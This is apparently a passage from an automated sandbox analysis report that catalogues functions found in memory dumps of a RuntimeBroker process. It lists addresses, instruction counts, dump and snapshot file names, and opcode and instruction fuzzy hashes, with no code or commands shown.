Opcode Fuzzy Hash: 62fd51ab0b8b1ab755241776db875449f73a5333c13350c53f94f13ffd463111
Instruction Fuzzy Hash: 7B21F470D0851D8FEB98EB98C494AECBBF1FF58340F50412AD009E72D2DB386980DB18

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1A561 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F1A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f1a000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95428f67bd9fa2ba34b2f99c46ffc9b680f4fb458b0880d7ce2cf656e67670fb
Instruction ID: 94cfe8bc04f4d75b6100e7fabbb7d5a8a49786c3f7f3b5a398074d8f0c98147f
Opcode Fuzzy Hash: 95428f67bd9fa2ba34b2f99c46ffc9b680f4fb458b0880d7ce2cf656e67670fb
Instruction Fuzzy Hash: 45214F7091C64D8FDB89EF18C4596ED7BE1FF28345F05016AE41AD7295DB34A880CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F133CF Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2269c1d92475c1b156eba170f61bd3806b1f545eb54540199a792bd4897f45a
Instruction ID: 779cb47d115778c6a9b4fad0fc84743df8f3d6c046762780974cec1ece82d982
Opcode Fuzzy Hash: d2269c1d92475c1b156eba170f61bd3806b1f545eb54540199a792bd4897f45a
Instruction Fuzzy Hash: 9421813084D69A9FD743AB7888986A97FF4FF16341F0904FAD089C70A2DB3C9855C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F223E1 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f21000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eed051c14138c8c09272b5c486cf2a195c6a818b394550ba655c9faf360c9801
Instruction ID: c8286484cf430dbd80527dc2b7cc3a650e2981d3000042d372cfd60a851f825d
Opcode Fuzzy Hash: eed051c14138c8c09272b5c486cf2a195c6a818b394550ba655c9faf360c9801
Instruction Fuzzy Hash: 5411DD7090C6498FDB48EF68D8961F97BE1FF58340F01067EE80AC3292CB35A550CB85

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F11F39 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2212a0798ec64210e2039efb29d411875b16377b48d8ff24d2513e364d069905
Instruction ID: 4fdc3be69e9156103e66e1291e2ed04ff169788edcfbbaa02d670b2a8f24f63c
Opcode Fuzzy Hash: 2212a0798ec64210e2039efb29d411875b16377b48d8ff24d2513e364d069905
Instruction Fuzzy Hash: B8117C2181E2C28EEB63A77858655616F945F03364F2D56FBE0D8CA0E3DB0D5C89C307

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F245D9 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f21000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 935726323334f691df8618690e7cf5b0fad04c9591ffc40e3210938c6c62254f
Instruction ID: 8b780521e9565cce6a2b2dfa175c217df0588bff092632b1c7265756af99120e
Opcode Fuzzy Hash: 935726323334f691df8618690e7cf5b0fad04c9591ffc40e3210938c6c62254f
Instruction Fuzzy Hash: 85218C3090D68E9FEB89EF6884592B9BFA0FF69341F0405BAD419C71D2DB79A440CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1085D Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18a668e1303ebbd1218a3f8e59280f4f60316dfc1ab42bb40cd6354a434069e8
Instruction ID: 56b2dfe25c57555eb7b63da7f0a4e92672bac8a6008c163f27c2710259bdc2c2
Opcode Fuzzy Hash: 18a668e1303ebbd1218a3f8e59280f4f60316dfc1ab42bb40cd6354a434069e8
Instruction Fuzzy Hash: 1B01D231D1C6AE9EE752FB7888885E87BE0FF95360F2504B3D849C60D2EF24A845C395

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F24B15 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f21000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8832ba85da384b01d3cfef2343caff52c7cd628f8fe2c9fbabc6a8a2816ff419
Instruction ID: 75793e30573acd717ad28c239f70c94c4eea6575c438d55a3f3dd1546175d6b4
Opcode Fuzzy Hash: 8832ba85da384b01d3cfef2343caff52c7cd628f8fe2c9fbabc6a8a2816ff419
Instruction Fuzzy Hash: A411A331D0DA898FEB99FB64A86A3B87BA0FF69341F0504BED00DC75D2DB6A6444C705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F24675 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f21000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aad779b82169114434f9e1fe866528255a63d10b4d740d0b5a475a5a256ce962
Instruction ID: ab7880742863b2aaa5850161d5338a96d6ce935df65151bcb371c2e4aa6dc6fc
Opcode Fuzzy Hash: aad779b82169114434f9e1fe866528255a63d10b4d740d0b5a475a5a256ce962
Instruction Fuzzy Hash: 8711603090D64E9FDB89EF6884592B9BBA0FF69341F0405BED409C25D5DB756440C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F225EB Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f21000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07bae3264dc85bb17528d0bb983838dec74345a8ec696650d1a882ea2c97f1d2
Instruction ID: d41e5a3cc9d0f987e3fe455c0d6024256d79ddf050a606794f4f98b7967a55e0
Opcode Fuzzy Hash: 07bae3264dc85bb17528d0bb983838dec74345a8ec696650d1a882ea2c97f1d2
Instruction Fuzzy Hash: D611D03184D7894FDB5AAB6498292F9BFA0FF16302F4504BAD40AC61E2EB396541C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1BE4D Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F1A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f1a000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d22846f21646073756d37b573225208049fe31ab6e00592446e2862f6e76c09
Instruction ID: a86e2904e72965e3ca9c0d2a466f7544600f7f7442e452f3fe494c8a7d9b987b
Opcode Fuzzy Hash: 3d22846f21646073756d37b573225208049fe31ab6e00592446e2862f6e76c09
Instruction Fuzzy Hash: 7021A070D1920ACFDB58EF95D4946EDBBB1BF18351F24013EE40AA72D1CB386990CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F27441 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F27000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F27000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f27000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c5c9a7c20c2a14435f2ac2d6265ba8cfd6ac52358349af194fdd382f472ecfa
Instruction ID: 06cbfb91fd5490e3d730dba5ccaeb91f5bd73cd04fb3dde00db1ce39bb187538
Opcode Fuzzy Hash: 7c5c9a7c20c2a14435f2ac2d6265ba8cfd6ac52358349af194fdd382f472ecfa
Instruction Fuzzy Hash: 2811703090D98EDFE751FBB898586A9BFE4FF19341F0405B6D408C7091DB34A590C755

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1359B Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b7e2b55fde4aacace1503e03596f55df423f0e57e923c17007e2cbcba6f8624
Instruction ID: fa361274491e43f744f6da20ff11e71014b357e262eb3daf39cd936c8f54d516
Opcode Fuzzy Hash: 0b7e2b55fde4aacace1503e03596f55df423f0e57e923c17007e2cbcba6f8624
Instruction Fuzzy Hash: 1E119E7090D98B8EEB59EB28D9196B977A0FF19745F0808BDC04ED30D2DF3C68018B18

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F24F29 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f21000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40e6fad87e477bc47e9bf6538d6e97c056c5b2388744e32bf612dc59e39fceb0
Instruction ID: bebee773a97dfacd2f7e25afdbef60d059efe2985f89925da9836b1f37e400fb
Opcode Fuzzy Hash: 40e6fad87e477bc47e9bf6538d6e97c056c5b2388744e32bf612dc59e39fceb0
Instruction Fuzzy Hash: D6119D30C0D68A8FEB86EB2488692B97BF0FF69301F0404BAC419C71D2EB796444C706

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F24C3D Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f21000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01790209601d059a5ed28a78009f2b5eebf6b6f3f353f183f6ac9806171aed27
Instruction ID: e90ca108ae7049884986cca8b2f129c1e005b00d156e4982d6e66cda34769ac6
Opcode Fuzzy Hash: 01790209601d059a5ed28a78009f2b5eebf6b6f3f353f183f6ac9806171aed27
Instruction Fuzzy Hash: 61118F70C4D68A9FEB99EF6894592BA7BA0FF29301F0404BAD409D71D2DB76A440C715

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F24E9D Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f21000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ee286a66ab6527c0c8b6e009a29e990d03184515a6738ef7a05738f7033b8cf
Instruction ID: 5b779cfa5549a25be362f248c524cca0995b0a5b97031892a8b535bd8ff92ea1
Opcode Fuzzy Hash: 6ee286a66ab6527c0c8b6e009a29e990d03184515a6738ef7a05738f7033b8cf
Instruction Fuzzy Hash: 7911CE30D0DA8A8FEB48EB2494696BD7BE0FF28301F0404BAD419C35D2DB6AA080C701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F227D1 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f21000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a362d9eca407942313cb5180574e8f86ae2212befb703b0e285146e256e18903
Instruction ID: 2dff1ce75f199ccda30e6ee5549751a9082a7662962eebfe1012b2e8eeb73fca
Opcode Fuzzy Hash: a362d9eca407942313cb5180574e8f86ae2212befb703b0e285146e256e18903
Instruction Fuzzy Hash: 8D11613090D59A9EE782FB68985C5F9BBE0FF19341F1449B6D408C7096EB349544C745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1AB15 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F1A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f1a000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 686960d96d5d99dcf91faaaaae729d68605468138476b728393d0cc3557712f4
Instruction ID: 2392103251e56cfb6c7293d317d51f8c8436caa0a08ad0a0a661f641b014441e
Opcode Fuzzy Hash: 686960d96d5d99dcf91faaaaae729d68605468138476b728393d0cc3557712f4
Instruction Fuzzy Hash: AA11D635A0D3564FD302EB6CE8A56D97BB0EF55361B0942F7C144CB093DA28A4498794

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F134F5 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06d1721b853515602e9b6e504d695a26a1b6b5b6de12c984918aaed9eee0f5a8
Instruction ID: 5940a3f4db1a8e545a2af39af447d2be2396880f813d34b0a6e925b6241b1a26
Opcode Fuzzy Hash: 06d1721b853515602e9b6e504d695a26a1b6b5b6de12c984918aaed9eee0f5a8
Instruction Fuzzy Hash: F3115B7091C68E8FDB99EF6888596BE7BA0FF18701F4404BED41AC61D2EB39A944C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1BCE5 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F1A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f1a000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb2748246f4c55061263fd77bb061f94e3f468b2cf5ced2cbe34b9234ea5fcb8
Instruction ID: 1cec42e245f5453f90c66a24e5727439eff4f9fce6926011f03908cb3afc8364
Opcode Fuzzy Hash: fb2748246f4c55061263fd77bb061f94e3f468b2cf5ced2cbe34b9234ea5fcb8
Instruction Fuzzy Hash: 64115B3091DA8E8FEB89EF6888592BDBBE0FF28341F4405BED419C61D2DB75A940C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F12E61 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5447f076b0da0b2d911e968aa227847ff1e2502436406ccf6f406f1ec5532dfa
Instruction ID: 9d3d88dd22e980bbceaad100081034d5dc6a8df7d9f61fba40542d834cbbc756
Opcode Fuzzy Hash: 5447f076b0da0b2d911e968aa227847ff1e2502436406ccf6f406f1ec5532dfa
Instruction Fuzzy Hash: B4017830D0D68E9FE751FBA888486B97BE0FF59341F0508BAE40CC61E2EB38E8548705

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F105D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b1dfcdd31271832b388e19802c524d428510c14ff3c0ee6e145b55ae41652e1
Instruction ID: ca5e7f37ceabe63fde143b716d0ac1ed3b8fd6f77376055a29597594a3efdaff
Opcode Fuzzy Hash: 9b1dfcdd31271832b388e19802c524d428510c14ff3c0ee6e145b55ae41652e1
Instruction Fuzzy Hash: 5B015E3090950E8FEB48EF24C4596FA77A1FF68345F50557ED40EC25D2DB36A9A0CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F27D31 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F27000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F27000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f27000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3652373ad62cd58519a300b56d89b115dcf0798d1b21c81d54b66bfac1fc6bb4
Instruction ID: e01601927d6add6e28c816e72df7c1d551d3445980acf707073d5a576a5a79ae
Opcode Fuzzy Hash: 3652373ad62cd58519a300b56d89b115dcf0798d1b21c81d54b66bfac1fc6bb4
Instruction Fuzzy Hash: 26017C3085DA898FDB49EF24D8696BD7BA0FF19340F4405BED40AC61D2DF76A550C741

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F22275 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F21000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F21000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f21000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00533019519e1c54ac0b400384bc8bbd070d110bb34b8c631552857bb88d4c41
Instruction ID: 248f0220d0ebf71db499229975cf1b0c8f13ece61b0d72e9459178123454ac51
Opcode Fuzzy Hash: 00533019519e1c54ac0b400384bc8bbd070d110bb34b8c631552857bb88d4c41
Instruction Fuzzy Hash: C601D43084D6498FEB49EF74D4686BABBA0FF19300F0108BAD41AC60D2DF36A554CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1283D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c7f53c7e129fce007ed01d27b7c59f62b6122ab3c4985d065b27d0db2b865d9
Instruction ID: f6fae19d5117623b675d58098730d39aaac0e9e1bceaf8bf5cf4f0d75fe4d1e9
Opcode Fuzzy Hash: 2c7f53c7e129fce007ed01d27b7c59f62b6122ab3c4985d065b27d0db2b865d9
Instruction Fuzzy Hash: 30018B3085D68E9FE795FBA8888C6B97BE0FF69351F5504B7D408C70A2EB38E8408704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F27DAD Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F27000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F27000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f27000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac77cbc1b2736a0e0ab0b664759d4c16a5e620304aa9e4c6fe952db57776a3eb
Instruction ID: 64ff1dda67fe3f37e30569a1d309ef827cf89810a427584bd21ad072fd7c8ef8
Opcode Fuzzy Hash: ac77cbc1b2736a0e0ab0b664759d4c16a5e620304aa9e4c6fe952db57776a3eb
Instruction Fuzzy Hash: 52019A3090DA8A8FDB4AEB3494692BE7BA0FF19340F8005BAD40AC61D2EF26A440C751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F12ED9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44f3ff4fda235a42c0ec9691bb4aaa24a6ac60c2932a91422fc7349e8880fb76
Instruction ID: 0b594ceb2db3002fbc9725ae6e9d4178789ac986a00828ac47bb046c51dda18e
Opcode Fuzzy Hash: 44f3ff4fda235a42c0ec9691bb4aaa24a6ac60c2932a91422fc7349e8880fb76
Instruction Fuzzy Hash: 4D017C3191D6898FE742FBB888596A97BE0EF5A340F4604B7D408CB0E6EB38A8448715

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F275C9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F27000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F27000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f27000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 181e088cccf242faf40903bbf734e53cd378620e8d2bfead75eb47232285743e
Instruction ID: a97e095d6a882e40e9bf1bf9a908fde9e1e459e68bef130ddea5d31d1f7e5491
Opcode Fuzzy Hash: 181e088cccf242faf40903bbf734e53cd378620e8d2bfead75eb47232285743e
Instruction Fuzzy Hash: 4B018F7084EA8A5FE742FB38989D1A9BFE0EF1A340F0508F2D408C70E2EF29A4448701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1AAA9 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F1A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f1a000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 510e074dd587119d5183f64ae483cf779da4f3f5f347298e7e744af98729e925
Instruction ID: 7da7c40768e600d927f821c736239432283221a269a3b0a14a9146b9c6cf9887
Opcode Fuzzy Hash: 510e074dd587119d5183f64ae483cf779da4f3f5f347298e7e744af98729e925
Instruction Fuzzy Hash: 61018F3094D6898FE752FB7489595A97BE0EF19380F050AF7D008C70A2EF38A884C711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F10608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 923239b3897f2199c91188e2045e613d6f60ad20f039000555c09881d3365210
Instruction ID: 682ff6b7012abdfdfd6709ff3f09070158d29f461978c7f72ad0fdebcd3d0cae
Opcode Fuzzy Hash: 923239b3897f2199c91188e2045e613d6f60ad20f039000555c09881d3365210
Instruction Fuzzy Hash: 2901693091860E9EEB59FBA484686BE76A1FF18345F50087EE40EC25D1DF35A990C704

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F10610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a3f9745e7f1b4e10dbe395c7d7ac08dd26b3d7c2bd9422c48a653cdbcf6565f
Instruction ID: 327cf9515e45d5f8b9f6d8ebd9bdcd2efff3287a904d1e3a45c9d03e92884cf9
Opcode Fuzzy Hash: 0a3f9745e7f1b4e10dbe395c7d7ac08dd26b3d7c2bd9422c48a653cdbcf6565f
Instruction Fuzzy Hash: 87016930918A0E9FEB59EBA484592BAB7E0FF18345F20087EE40EC21D1DF3AA950C714

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F11BED Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16678c88aa10f7af519639faa92855bdc82526b7ac9fb10ae3803060e6b2fac2
Instruction ID: 958c0b025dbdcda041156ecf90a01a6f9864f4c0ee2a2abe168bb948c4846c22
Opcode Fuzzy Hash: 16678c88aa10f7af519639faa92855bdc82526b7ac9fb10ae3803060e6b2fac2
Instruction Fuzzy Hash: B001813090D68E8FEB59EF2484556FA7BA0FF55341F4415BED808C71D2DB359890C745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F105D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7d6c8f0daf6acecaa09ca312842dc0761896322433a015cdc91b33817cb9617
Instruction ID: 093b1ee28fad4b29ff5adb7709d561357369047c678d5e76b4642e31d7c9e1bf
Opcode Fuzzy Hash: a7d6c8f0daf6acecaa09ca312842dc0761896322433a015cdc91b33817cb9617
Instruction Fuzzy Hash: 11F0F63080E64E8FEB44FF2494052FA77A4FF15349F10153AE80DC21C2DB35A8A0CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F1BE37 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F1A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F1A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f1a000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b560281b64557949bb1898814a498c69014c2f177a1c779df31e33e5358b09d3
Instruction ID: e82182740f22e0cd4f613446e29e145c0e354cf7ed2f36ad6fec5b8541ede28f
Opcode Fuzzy Hash: b560281b64557949bb1898814a498c69014c2f177a1c779df31e33e5358b09d3
Instruction Fuzzy Hash: 3401C874D0960ACFDB18EF85D4906EDBBB1EF48360F24012ED506A32D0CB386D51CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848F12759 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000021.00000002.2208792129.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_7ff848f10000_RuntimeBroker.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ccfdc38e86a8c69656d9156a2cde795f96c98e9bf8838ade855f022e6991632
Instruction ID: ac7502fbe776da0007cc97f7db01d8f13143fc5331a398108f0596fb85e36a07
Opcode Fuzzy Hash: 8ccfdc38e86a8c69656d9156a2cde795f96c98e9bf8838ade855f022e6991632
Instruction Fuzzy Hash: 3DF0963180E78A8FEB5AEFB488692BA7F61FF16301F4505FAD409C65D2DB38A854C741

Uniqueness

Uniqueness Score: -1.00%

